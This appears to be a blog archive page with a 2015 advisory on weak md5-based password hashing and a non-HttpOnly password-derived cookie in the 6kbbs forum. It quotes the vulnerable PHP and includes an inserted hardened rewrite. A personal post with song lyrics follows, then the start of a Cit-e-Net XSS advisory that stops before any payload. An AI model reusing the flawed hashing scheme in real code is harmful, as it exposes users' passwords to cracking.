<a href="http://3.bp.blogspot.com/-tOyOzdiWbxw/VX0aDDpKJ_I/AAAAAAAABC8/0olgl72x-nA/s1600/6kbbs_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://3.bp.blogspot.com/-tOyOzdiWbxw/VX0aDDpKJ_I/AAAAAAAABC8/0olgl72x-nA/s400/6kbbs_1.png" width="400" /></span></a></div>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Advisory Publication: June 08, 2015</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Latest Update: June 10, 2015</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Inadequate Encryption Strength [CWE-326]</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Discoverer and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (<a href="https://twitter.com/justqdjing/status/608928069663850497">@justqdjing</a>)</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Recommendation Details:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v7.1</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v8.0</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs can be obtained from here:</span><br />
<a href="http://www.6kbbs.com/download.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions. Forum Technical realization (a) interface : using XHTML + CSS structure, so the structure of the page , easy to modify the interface ; save the transmission static page code , greatly reducing the amount of data transmitted over the network ; improve the interface scalability , more in line with WEB standards, support Internet Explorer, FireFox, Opera and other major browsers. (b) Program : The ASP + ACCESS mature technology , the installation process is extremely simple , the environment is also very common."</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b) Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent community forum process . The program is simple but not simple ; fast , small ; interface generous and good scalability ; functional and practical . pursue superiority , good interface , practical functions of choice for subscribers."</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The 6kbbs web application has a security problem: it can be exploited by weak encryption attacks. The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several 0-day web bugs in 6kbbs products have been found by other bug hunters before. 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many web security vulnerabilities have been published there.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code:</span></b><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><?php</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">if(empty($row)){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $extrow=$db->row_select_one("users","username='{$username}'");</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(!empty($extrow) && !empty($extrow['salt'])){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $row=$extrow;</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["userpass"]=$userpass_encrypt;</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $new_row["salt"]="";</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> $db->row_update("users",$new_row,"id={$extrow['id']}");</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> }</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">}</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">?></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code From:</span><br />
<a href="http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">We can see that the "userpass" value stored in the cookie is derived directly from the user password "$userpass", and the cookie has no "HttpOnly" attribute at all. Since md5 is used for the encryption, it is easy for attackers to break the encrypted value.</span><br />
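<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">A hardened counterpart to the login snippet above, as an added example that is not 6kbbs code: it still accepts rows in the md5(md5($userpass).$salt) format shown on the page, but upgrades them to password_hash() on the next successful login and replaces the password-derived cookie with a random, HttpOnly session token. The function names, the cookie name "session" and the sample row are assumptions.</span><br />

```php
<?php
// Added example: hypothetical helpers, not 6kbbs code. The column names
// (userpass, salt) follow the snippet above; everything else is assumed.
// Requires PHP 7.3+ (options-array form of setcookie()).

/** Legacy scheme from the page: md5(md5($password) . $salt). */
function legacy_matches(array $row, string $password): bool
{
    if (empty($row['salt'])) {
        return false;
    }
    // hash_equals() compares in constant time, unlike ==.
    return hash_equals($row['userpass'], md5(md5($password) . $row['salt']));
}

/**
 * Check a login attempt against one user row.
 * Returns null when the password is wrong, otherwise the columns that
 * should be written back (an empty array when nothing needs updating).
 */
function verify_and_upgrade(array $row, string $password): ?array
{
    if (!empty($row['salt'])) {
        // Row still in the legacy format: verify, then replace it with a
        // slow, salted hash so the MD5 value no longer exists anywhere.
        if (!legacy_matches($row, $password)) {
            return null;
        }
        return [
            'userpass' => password_hash($password, PASSWORD_DEFAULT),
            'salt'     => '',
        ];
    }

    if (!password_verify($password, $row['userpass'])) {
        return null;
    }
    // Re-hash when PHP's default algorithm or cost has moved on.
    if (password_needs_rehash($row['userpass'], PASSWORD_DEFAULT)) {
        return ['userpass' => password_hash($password, PASSWORD_DEFAULT)];
    }
    return [];
}

/**
 * Create a random session token. The cookie carries the token; the server
 * stores only its SHA-256 digest, so neither side holds password material.
 */
function new_session_token(): array
{
    $token = bin2hex(random_bytes(32));
    return ['cookie' => $token, 'stored' => hash('sha256', $token)];
}

function send_session_cookie(string $token): void
{
    setcookie('session', $token, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,   // HTTPS only
        'httponly' => true,   // not readable from page scripts
        'samesite' => 'Lax',
    ]);
}

// Constructed sample row in the legacy format.
$salt = 'a1b2c3';
$row  = ['id' => 1, 'userpass' => md5(md5('correct horse') . $salt), 'salt' => $salt];

var_dump(verify_and_upgrade($row, 'wrong guess'));

$update = verify_and_upgrade($row, 'correct horse');
if ($update !== null) {
    $row = array_merge($row, $update);   // stands in for the UPDATE query
    $session = new_session_token();
    if (PHP_SAPI !== 'cli' && !headers_sent()) {
        send_session_cookie($session['cookie']);
    }
    echo "stored hash format: ", password_get_info($row['userpass'])['algoName'], "\n";
    echo "second login ok:    ", var_export(verify_and_upgrade($row, 'correct horse') !== null, true), "\n";
}
```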
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"The MD5 message-digest cryptography algorithm is a widely used cryptographic hash function producing a 128-bit (16-byte) hash value, typically expressed in text format as a 32 digit hexadecimal number. Papers about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile, researchers focusing on it spread in Computer Science, Computer Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety of cryptographic applications, and is also commonly used to verify data integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier hash function, MD4. The source code in RFC 1321 contains a "by attribution" RSA license." (Wikipedia)</span><br />
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">References:</span></b><br />
<a href="http://seclists.org/fulldisclosure/2015/Jun/34"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Jun/34</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/06/11/6"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/06/11/6</span></a><br />
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=143405936018977&w=2"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02160.html</span></a><br />
<a href="https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://packetstormsecurity.com/files/132270/6kbbs-7.1-8.0-Weak-Cryptography.html</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2092</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/234603051201551415853846/#"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551415853846/#</span></a><br />
<a href="http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://essaybeans.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a><br />
<a href="https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/06/14/6kbbs-weak-encryption/</span></a><br />
<a href="http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/06/6kbbs-v80-weak-encryption-cryptography.html</span></a><br />
<a href="https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2015/06/11/6kbbs-v8-0-weak-encryption/</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-security/6kbbs-v8-0-weak-encryption/</span></a><br />
Posted by essayjeans<br />
<br />
"熱帶雨林" (Tropical Rainforest) - S.H.E - 青春株式會社: a soft, gentle Chinese-language song (published 2015-06-07, updated 2015-06-07)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-aA46stOLSaM/VXP_pMxl7DI/AAAAAAAAASo/U13aL9LQqaA/s1600/48.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="http://4.bp.blogspot.com/-aA46stOLSaM/VXP_pMxl7DI/AAAAAAAAASo/U13aL9LQqaA/s400/48.jpg" width="400" /></a></div>
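<span style="font-family: Arial,Helvetica,sans-serif;">In high school, I first heard this song from a classmate and loved it immensely. Now, many years have passed and things are no longer what they were, so I made a video to console myself and to commemorate my bygone youth. "熱帶雨林" (Tropical Rainforest) uses a soft, gentle melody that easily brings back memories, and its sad yet moving lyrics readily resonate with listeners. Through the perfect coordination of the three singers, the song expresses the feeling of adolescent boys and girls trapped in their emotions, as if in a dream, lost in a tropical rainforest.</span><br />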
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Music<br />Album: "青春株式會社"<br />Original artists: SHE - 任家萱(Selina)、田馥甄(Hebe)、陳嘉樺(Ella)<br />Lyrics: 方文山<br />Composer: 周傑倫</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">歌曲歌詞<br />冷風過境 回憶凍結成冰<br />我的付出全都要不到回音<br />悔恨就象是綿延不斷的丘陵<br />痛苦全方位的降臨<br />悲傷入侵<br />誓言下落不明我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心<br />悲傷入侵 誓言下落不明<br />我找不到那些愛過的曾經<br />妳象在寂寞上空盤旋的禿鷹<br />將我想妳啃食幹凈<br />月色搖晃樹影 穿梭在熱帶雨林<br />妳離去的原因 從來不說明<br />妳的謊象陷阱 我最後才清醒<br />幸福只是水中的倒影<br />月色搖晃樹影 穿梭在熱帶雨林<br />悲傷的雨不停 全身血淋淋<br />那深陷在沼澤 我不堪的愛情<br />是我無能為力的傷心</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Produced by: 谷雨 (Essayjeans) <a href="https://twitter.com/justqdjing/status/586520579353640960">@justqdjing</a><br />Images: from the Internet<br /><a href="http://www.tetraph.com/blog/essayjeans/">http://www.tetraph.com/blog/essayjeans/</a><br /><br /></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /><br />Video URL: <a href="https://www.youtube.com/watch?v=VNi6oIf_u3Y">https://www.youtube.com/watch?v=VNi6oIf_u3Y</a><br />Lyrics link: <a href="http://essayjeans.blog.163.com/blog/static/23717307420155744626301/">http://essayjeans.blog.163.com/blog/static/23717307420155744626301/</a><br />Twitter: <a href="https://twitter.com/essayjeans/status/607468881662214144">https://twitter.com/essayjeans/status/607468881662214144</a><br />Lofter: <a href="http://aibiyi.lofter.com/post/1cc9f4e9_735dd83">http://aibiyi.lofter.com/post/1cc9f4e9_735dd83</a><br />Tumblr: <a href="http://canghaixiao.tumblr.com/post/120922254507">http://canghaixiao.tumblr.com/post/120922254507</a><br />Google+: <a href="https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6">https://plus.google.com/u/0/+essayjeans/posts/HrzASc1VcG6</a><br />Facebook: <a href="https://www.facebook.com/essayjeans/posts/840142132743607">https://www.facebook.com/essayjeans/posts/840142132743607</a></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-61632776496442788502015-06-06T20:38:00.000-07:002015-06-06T20:38:42.054-07:00CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities<div>
<div>
<div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-i4WxuYQ10hc/VXOxdKlOyeI/AAAAAAAAA_s/Ur59-svSJ9A/s1600/cit_e_net.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://1.bp.blogspot.com/-i4WxuYQ10hc/VXOxdKlOyeI/AAAAAAAAA_s/Ur59-svSJ9A/s400/cit_e_net.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><strong>CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</strong></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong></span></div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Product: Cit-e-Access</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: Cit-e-Net</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: Version 6</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: Version 6</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: February 12, 2015</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: June 01, 2015</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Scripting [CWE-79]</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: CVE-2014-8753</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 2.9</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized modification</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Author: <span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">Jing Wang [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (</span><a href="https://twitter.com/justqdjing/status/565810093564772352">@justqdjing</a><span style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.6000003814697px; text-align: justify;">)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Instruction Details:</span></strong></div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vendor & Product Description:</span></strong><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><strong><br /></strong><strong><br /></strong><strong><br /></strong></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product & Version: </span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Version 6</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & Download: </span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net can be downloaded from here,</span></div>
<div>
<a data-mce-href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" href="https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.cit-e.net/<wbr></wbr>citeadmin/help/<wbr></wbr>cntrainingmanualhowto.pdf</span></a></div>
<div>
<a data-mce-href="http://demo.cit-e.net/" href="http://demo.cit-e.net/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://demo.cit-e.net/</span></a></div>
<div>
<a data-mce-href="http://www.cit-e.net/demorequest.cfm" href="http://www.cit-e.net/demorequest.cfm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cit-e.net/<wbr></wbr>demorequest.cfm</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" href="http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17" target="_blank">http://demo.cit-e.net/Cit-e-<wbr></wbr>Access/ServReq/?TID=1&TPID=17</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction:</span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"We are a premier provider of Internet-based solutions encompassing web site development and modular interactive e-government applications which bring local government, residents and community businesses together.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Net provides a suite of on-line interactive services to counties, municipalities, and other government agencies, that they in turn can offer to their constituents. The municipal government achieves a greater degree of efficiency and timeliness in conducting the daily operations of government, while residents receive improved and easier access to city hall through the on-line access to government services.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Our web-based applications can help your municipality to achieve its e-government goals. Type & click website content-management empowers the municipality to manage the website quickly and easily. Web page styles & formats are customizable by the municipality, and because the foundation is a database application, user security can be set for individual personnel and module applications. Our application modules can either be integrated into your existing municipal web site or implemented as a complete web site solution. It's your choice! Please contact us at info@cit-e.net to view a demonstration of our municipal web site solution if you are an elected official or member of municipal management and your municipality is looking for a cost efficient method for enhancing & improving municipal services. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Interactive Applications</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Service Requests</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Tax Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online Utility Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Online General-Payments by ACH electronic-check or credit card.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Submit Volunteer Resume's Online for the municipality to match your skills with available openings."</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /><br /></span></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
<strong><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></strong></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Cit-e-Access <span style="background-color: white;">web application has cross-site scripting (XSS) vulnerabilities. They may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.</span></span><br />
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several 0-day vulnerabilities in similar products have been found by other researchers before. Cit-e-Access has patched some of them. The Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, and solution details related to important vulnerabilities and cyber intelligence.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
